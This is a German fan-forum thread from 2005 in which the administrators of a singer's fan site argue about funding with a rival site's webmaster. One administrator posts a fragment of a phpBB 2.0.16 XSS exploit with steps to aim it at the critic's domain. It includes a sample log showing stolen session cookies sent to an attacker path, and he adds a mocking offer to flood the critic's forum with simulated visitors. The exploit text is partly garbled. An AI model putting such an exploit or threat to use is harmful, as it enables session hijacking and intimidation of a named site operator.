Elli E. Forum  

Zurück   Elli E. Forum > News und Ankündigungen > News

News News über Elli

Thema geschlossen

Themen-Optionen Thema bewerten Ansicht
Alt 17.07.2005, 17:53
Benutzerbild von sbs
sbs sbs ist offline
Registrierter Benutzer

Registrierungsdatum: 02.2004
sbs befindet sich auf einem aufstrebenden Ast
Interessante Diskussion hier... ich möchte dazu auch mal was sagen, und das ist jetzt die Meinung eines Menschen, der selber eine Homepage samt Forum für eine Sängerin betreibt und hier bei Elli ein "Aussenstehender" ist, der aus großem Interesse an Elli zwar regelmäßig, aber nicht gerade ausgiebig 'rein schaut.

Ich finde, dass die Administration hier einen ganz falschen Ansatz verfolgt. Ihr verwechselt so eine Künstler/innen-Internetpräsenz mit einem wirtschaftlichen Betrieb. Hier geht es doch nicht darum, Kunden anzuwerben, die Produkte "kaufen" und damit die Kosten des Betriebs decken. Genau so sieht das aber aus, wenn ich die offiziellen Postings zu diesem Thema lese. Ihr solltet die Fans nicht als Kunden betrachten, sondern als (sehr wichiges) PR-Medium für Elli, das gehegt und gepflegt werden muss - das heisst, so viele wie möglich mit attraktivem Content anzuziehen und darauf zu bauen, dass sie langfristig bleiben und selber weitere Besucher/innen durch Mundpropaganda hierher führen.

Der Ansatz, für Engagement einen finanziellen Beitrag zu fordern, der auch noch mit steigendem Enagement höher wird, ist widersinnig und kontraproduktiv. Und auch die Vergleiche mit Eis-Essen etc. hinken, weil es hier eben NICHT um ein käufliches Produkt geht, sondern um Emotionen. Die Besucher/innen dieser Homepage kommen nicht zum Einkaufen hierher - sie werden von ihrer Begeisterung für eine Künstlerin geleitet und wollen was über sie erfahren und mit Gleichgesinnten in Kontakt treten. Und das sollte grundsätzlich offen und ohne finanzielle Barrieren möglich sein. Es mag Menschen geben, die auch bereit sind, dafür was zu zahlen, aber die Mehrheit fühlt sich dadurch sicherlich vor den Kopf gestoßen.

Ebenso finde ich das permanente Gejammer der Administration über die gar so hohen Kosten völlig deplatziert. Bezahlt ihr echt Programmierer für das Forum? Oder wie soll ich die Bemerkung von Mikey verstehen, "...die lassen sich auch gut dafür bezahlen...". Wer heute eine Homepage samt Forum betreibt und ausser der Miete für's Web-Hosting sonst noch Kosten hat, macht irgendwas falsch. Erstens ist die ganze erforderliche Software - in beachtlicher Qualität - heute frei erhältlich. Und zweitens finden sich in einer Fangemeinde IMMER hochmotivierte Menschen, die die erforderliche Arbeit gerne ehrenamtlich machen. Dazu in der Regel auch noch in größerem Umfang und besserer Qualität als jemand, der das als bezahlten Job macht.

Also ich weiss echt nicht, wo diese angebliche Finanzkrise herkommen sollte... vielleicht sollte die Administration erst mal schauen, an welchen Stellen sie selbst unwirtschaftlich arbeitet, bevor hier zur Kasse gebeten und gar mit Drohungen der Schliessung gearbeitet wird. Was an Kosten übrig bleibt, wenn mal alle unnötigen Ausgaben beseitigt sind, ist so niedrig, dass das locker sogar aus privater Tasche gezahlt werden kann. Und auch dafür würden sich dann erfahrungsgemäß Menschen finden, die das gerne übernehmen.

Denkt einfach mal drüber nach...
Ciao... Sven

Geändert von sbs (17.07.2005 um 22:07 Uhr)
Alt 18.07.2005, 02:42
Benutzerbild von Mikey
Mikey Mikey ist offline
Administrator

Registrierungsdatum: 11.2003
Mikey ist zur Zeit noch ein unbeschriebenes Blatt
Zitat:
Zitat von sbs/sven
Ich finde, dass die Administration hier einen ganz falschen Ansatz verfolgt. Ihr verwechselt so eine Künstler/innen-Internetpräsenz mit einem wirtschaftlichen Betrieb. Hier geht es doch nicht darum, Kunden anzuwerben, die Produkte "kaufen" und damit die Kosten des Betriebs decken. Genau so sieht das aber aus, wenn ich die offiziellen Postings zu diesem Thema lese. Ihr solltet die Fans nicht als Kunden betrachten, sondern als (sehr wichiges) PR-Medium für Elli, das gehegt und gepflegt werden muss - das heisst, so viele wie möglich mit attraktivem Content anzuziehen und darauf zu bauen, dass sie langfristig bleiben und selber weitere Besucher/innen durch Mundpropaganda hierher führen.
Offenbar hast du das in den vorangegangenen Antworten nicht verstanden, solange nicht die Seite über das Management finanziert wird müssen wir das eben so finanzieren, das ist etwas das nicht in unserem Einflussbereich liegt.

Zitat:
Zitat von sbs/sven
Der Ansatz, für Engagement einen finanziellen Beitrag zu fordern, der auch noch mit steigendem Enagement höher wird, ist widersinnig und kontraproduktiv. Und auch die Vergleiche mit Eis-Essen etc. hinken, weil es hier eben NICHT um ein käufliches Produkt geht, sondern um Emotionen. Die Besucher/innen dieser Homepage kommen nicht zum Einkaufen hierher - sie werden von ihrer Begeisterung für eine Künstlerin geleitet und wollen was über sie erfahren und mit Gleichgesinnten in Kontakt treten. Und das sollte grundsätzlich offen und ohne finanzielle Barrieren möglich sein. Es mag Menschen geben, die auch bereit sind, dafür was zu zahlen, aber die Mehrheit fühlt sich dadurch sicherlich vor den Kopf gestoßen.
Tjo für dich mag das so sein, für mich handelt es sich hier letztlich aber trozdem nur um ein Produkt, eines in das wir schon viel Zeit und Geld investiert haben. Sicherlich magst du recht haben das es sinnvoller wär die sache als PR finanzieren zu lassen, aber wie ich schon oben sagte liegt diese Entscheidung nicht bei uns (s.o.).

Zitat:
Zitat von sbs/sven
Ebenso finde ich das permanente Gejammer der Administration über die gar so hohen Kosten völlig deplatziert. Bezahlt ihr echt Programmierer für das Forum? Oder wie soll ich die Bemerkung von Mikey verstehen, "...die lassen sich auch gut dafür bezahlen...".
Die Bemerkung stammt aus der Antwort zu einem Absatz wo es darum ging was gut gefällt.. und da wir die Foren Software nicht selber programmiert haben sondern per Lizenz erworben haben - ja für Geld logischerweise - war der Hinweis angebracht.

Ulkig aber das die Frage von Dir kommt.. wo du doch sagst selber schon erfahren im Webhosting bereich zu sein, denn genaugenommen steht der Name der Foren Software unter jeder Seite deutlich drunter und jeder der wirklich schonmal Foren Betrieben hat und sich ernsthaft mit Foren Software beschäftigt hat müsste zumindest schonmal von vBulletin gehört haben, zumal das sicherlich eine der bekanntesten Forenlösungen ist, mal von phpBB abgesehen, welches ja mehr für seine Exploitbarkeit bekannt ist als alles andere

Und bevor Du mir jetzt das Gegenteil "behaupten" willst, da Du ja offenbar selber phpBB auf deiner Seite benutzt.. der letzte lustige remote exploit fürs phpBB der mal wieder (..) volle Webserver Rechte vergibt ist auch noch keinen Monat alt, hoffentlich hast Du schon gepatched..

Zitat:
Zitat von sbs/sven
Und zweitens finden sich in einer Fangemeinde IMMER hochmotivierte Menschen, die die erforderliche Arbeit gerne ehrenamtlich machen. Dazu in der Regel auch noch in größerem Umfang und besserer Qualität als jemand, der das als bezahlten Job macht.
Jo nette Behauptung, faktisch siehts aber so aus das mir noch keine Elli Homepage begegnet ist die auch nur annähernd an die von uns gebotene Qualität kommt - das soll jetzt nicht als Kritik an den diversen existierenden Seiten missverstanden werden.

Zitat:
Zitat von sbs/sven
Was an Kosten übrig bleibt, wenn mal alle unnötigen Ausgaben beseitigt sind, ist so niedrig, dass das locker sogar aus privater Tasche gezahlt werden kann. Und auch dafür würden sich dann erfahrungsgemäß Menschen finden, die das gerne übernehmen.
Sicherlich kann man wenn man an der Qualität sparrt auch Geld einsparen, das steht völlig ausser Zweifel, ist hier aber nicht Diskutabel, es gibt genug andere Seiten die das machen.

Geändert von Mikey (18.07.2005 um 03:40 Uhr)
Alt 18.07.2005, 15:22
Benutzerbild von Peter
Peter Peter ist offline
Administrator

Peter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes Ansehen
Peter eine Nachricht über Skype™ schicken
nachdem die letzten 10 postings nichts mit der eigentlichen umfrage zu tun haben ("Was soll verbessert werden") wurden diese verschoben.

Und lieber SBS, hier gleich was für dich - funktioniert auch mit deinem Forum

Code:
/*
1) Change milw0rm.com to stefanie-nerpel.com
2) Post the below code into a new message.

Example Output:
***.**.***.*** - - [17/Jul/2005:03:09:13 -0500] 
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke
*/

******************************************************************************************************
*					CCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *
*                                           Powered by D|ablo CCTEAM                                 *
******************************************************************************************************
www.ut'

*				               http://ccteam.ru/                                     *
*                                             http://defacers.ru/                                    *
# milw0rm.com [2005-07-16]
viel spass beim testen

Achja, es gibt da noch so eine Klitzekleinigkeit und die heisst Zugriffszahlen

während deine seite da schon 16000 Besucher hatte, schafft das Elli an 2 guten Tagen (und da kündigt dir jeder Provider, lies dir mal die AGBs deines Providers durch: ich zitiere hier an der Stelle):

Zitat:
13.6
Der Kunde ist verpflichtet, seine Internet-Seite so zu gestalten, dass eine übermäßige Belastung des Servers, z.B. durch CGI-Skripte, die eine hohe Rechenleistung erfordern oder überdurchschnittlich viel Arbeitsspeicher beanspruchen, vermieden wird. Schlund + Partner ist berechtigt, Seiten, die den obigen Anforderungen nicht gerecht werden, vom Zugriff durch den Kunden oder durch Dritte auszuschließen. Schlund + Partner wird den Kunden unverzüglich von einer solchen Maßnahme informieren. Schlund + Partner wird die betreffenden Seiten wieder zugänglich machen, wenn der Kunde Schlund + Partner nachweist, dass die Seiten so umgestaltet wurden, dass sie den obigen Anforderungen genügen.
Foren, php-gästebücher verbraten eine ganze Menge an "power". (wir simulieren dir gerne 100 permanete Besucher in deinem Forum, dann wirst du sehen was solche Angebote wert sind.
Solltest du dich mehr für dieses Thema interessieren schau dir diverse Hostingseiten an, warum die Webhoster manch Kunden kündigen.

Es besteht nunmal doch (und vielleicht mag das auch ein Indiz für die Qualität unserer Seite sein) ein Unterschied zwischen DSDS2-Gewinnerin Ellis "Besucherzahlen), die eine relativ starke Medienpräsenz hatte bzw. wahrscheinlich auch wieder haben wird (im Hinblick auf Onkel Stein), und dem kleinen Sternchen Steffi Nerpel, von dem ich noch nie was gehört habe, die aber ganz vernünftig singt. Da ergeht noch der Hinweis das die Songs auf deiner Seite Gema/GVU pflichtig sind..aber ich denke das ist alles angemeldet.

Geändert von Peter (18.07.2005 um 17:17 Uhr)
Alt 18.07.2005, 18:30
Benutzerbild von sbs
sbs sbs ist offline
Registrierter Benutzer

Zitat:
Zitat von Peter
während deine seite da schon 16000 Besucher hatte, schafft das Elli an 2 guten Tagen (und da kündigt dir jeder Provider, lies dir mal die AGBs deines Providers durch: ich zitiere hier an der Stelle):
Nun stör dich mal nicht an diesem Spielzeug-Zähler, der 16.000 anzeigt. Der zählt keine Zugriffe, sondern unterschiedliche IP-Adressen, die nacheinander zugreifen. Ist also nur ein Indikator, um zu sehen, wieviel grad los ist. Die echten Zugriffszahlen sind natürlich viel höher und liegen bei über 70.000 pro Monat - also rund 2.300 pro Tag im Schnitt. Darum habe ich auch einen fetten Webhosting-Vertrag, der mir ein solches Volumen erlaubt.

Zitat:
Zitat von Peter
Es besteht nunmal doch (und vielleicht mag das auch ein Indiz für die Qualität unserer Seite sein) ein Unterschied zwischen DSDS2-Gewinnerin Ellis "Besucherzahlen), die eine relativ starke Medienpräsenz hatte bzw. wahrscheinlich auch wieder haben wird (im Hinblick auf Onkel Stein), und dem kleinen Sternchen Steffi Nerpel, von dem ich noch nie was gehört habe, die aber ganz vernünftig singt.
Das "kleine Sternchen" war immerhin Zweite bei Starsearch 2 - aber ich glaube, das tut hier gar nichts zur Sache. Genau so wenig wie die Fragen, was für einen Provider und was für einen Webhosting-Vertrag ich habe, und wieviele Besucher auf meiner Page täglich rumrutschen. Was willst du damit sagen? Dass auf meiner Page weniger los ist und ich daher nicht kompetent genug bin, mir hier Kritik zu erlauben? Wen willst du damit wovon überzeugen?
Alt 18.07.2005, 18:51
Benutzerbild von Peter
Peter Peter ist offline
Administrator

Peter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes Ansehen
Peter eine Nachricht über Skype™ schicken
nun kann ich leider nicht wiederstehen:

"Der Rekord liegt bei 8 Benutzern..." (deine steffi seite)

"Mit 187 Benutzern waren die meisten Benutzer gleichzeitig online" (elli-e.de)

sowas zu vergleichen ist natürlich humbug.

das erstere lässt sich nebenbei auf nem server betreiben,

bei letzterem ist nen server komplett ausgelastet

und wenn du willst, elli-e.de hat pro monat zugriffszahlen im zweistelligen millionenbereich, aber das ist wie mit jeder statistik . Wir zählen nur unique visitors

Dein "fetter Webhosting Vertrag" kostet sicher auch einiges an Knete..

(würde man sich nur nach dem Speicherplatzbedarf richten, bräuchten wir ca. 6-10 deiner Pakete - unsere Lösung ist daher durchaus kostengünstig).
Zudem setzen wir was die technische Struktur anbelangt auf Qualität, Sicherheit und Ausfallsicherheit.

Geändert von Peter (18.07.2005 um 19:00 Uhr)
Alt 18.07.2005, 19:03
muluc muluc ist offline
Registrierter Benutzer

muluc befindet sich auf einem aufstrebenden Ast
Kann den Einwand bzgl. OFF-TOPIC tw. verstehen, aber dann sollten die Beiträge doch auch wirklich v e r s c h o b e n werden, nach der eigentlichen Bedeutung des Wortes
(meinetwegen auch in den FC-Bereich)..
Oder meinst du damit: verschoben in den "Papierkorb", dann hast du das Wort allerdings richtig ausgewählt.

ON-Topic: Vll. könntet ihr innerhalb des Punkts "Zur Zeit aktive Benutzer" beheben, als eingeloggtes FC(??)-Mitglied sehen zu können, wer im Moment Private Nachrichten verschickt (beide Mitglieder werden namentlich genannt, nicht nur derjenige, der gerade die PN verfasst).
Is zwar nicht tragisch, aber auch nicht nötig.
Früher konnte man lediglich sehen, wer sich gerade im Bereich Private Nachrichten befindet.
Alt 18.07.2005, 19:16
Benutzerbild von Elli live Fan
Elli live Fan Elli live Fan ist offline
Registrierter Benutzer

Registrierungsdatum: 04.2004
Elli live Fan befindet sich auf einem aufstrebenden Ast
Nun muss ich auch noch mal mich zu Wort melden.

Die 187 gleichzeitigen Besucher am 15.05.2004 waren in der Höhe leider eine Ringeltaube. Der Zulauf kam wohl dadurch zustande, dass es den Elli Auftritt am Tag des Grandprix Auftritts von Max Mutzke gab.
Ansonsten liegen die Höchstwerte vielleicht bei um die 50 User, aber auch eher seltener.

Zum anderen:
Bei solch hohen Zugriffszahlen im zweistelligen Millionenbereich pro Monat besteht allerdings auch eine noch größere Gefahr, sehr viele temporäre Besucher gleichzeitig zu vergraulen.

Einträge zu verschieben, sprich zu löschen, deutet eher an, dass diese Meinungen ins Wespennest gestochen haben.

Elli live Fan

Elli Tour und TV

Alt 17.07.2005, 22:00
Benutzerbild von Flyin FoX
Flyin FoX Flyin FoX ist offline
Registrierter Benutzer

Registrierungsdatum: 12.2004
Flyin FoX befindet sich auf einem aufstrebenden Ast
Flyin FoX eine Nachricht über ICQ schicken
Suuuuuuuuuper Steffi, endlich mal eine die hier ein Machtwort spricht, wie die Lage ausschaut oder verbessert werden kann..
Klasse!!! Danke!!!!!!!!!!

Alt 17.07.2005, 22:10
Benutzerbild von sbs
sbs sbs ist offline
Registrierter Benutzer

Gern geschehen! Ich muss allerdings hinzufügen, dass das Posting nicht von Steff selbst war, sondern von mir - ihrem Webmaster Sven. Sorry, das war wirklich nicht klar ersichtlich... drum habe ich jetzt nachträglich noch "Ciao... Sven" drunter geschrieben, damit's künftig keine Verwechslungen mehr gibt.
Alt 17.07.2005, 22:21
Benutzerbild von Flyin FoX
Flyin FoX Flyin FoX ist offline
Registrierter Benutzer

Registrierungsdatum: 12.2004
Flyin FoX befindet sich auf einem aufstrebenden Ast
Flyin FoX eine Nachricht über ICQ schicken
Sorry....dann hald danke dir Sven

Thema geschlossen

Themen-Optionen
Ansicht Thema bewerten
Thema bewerten: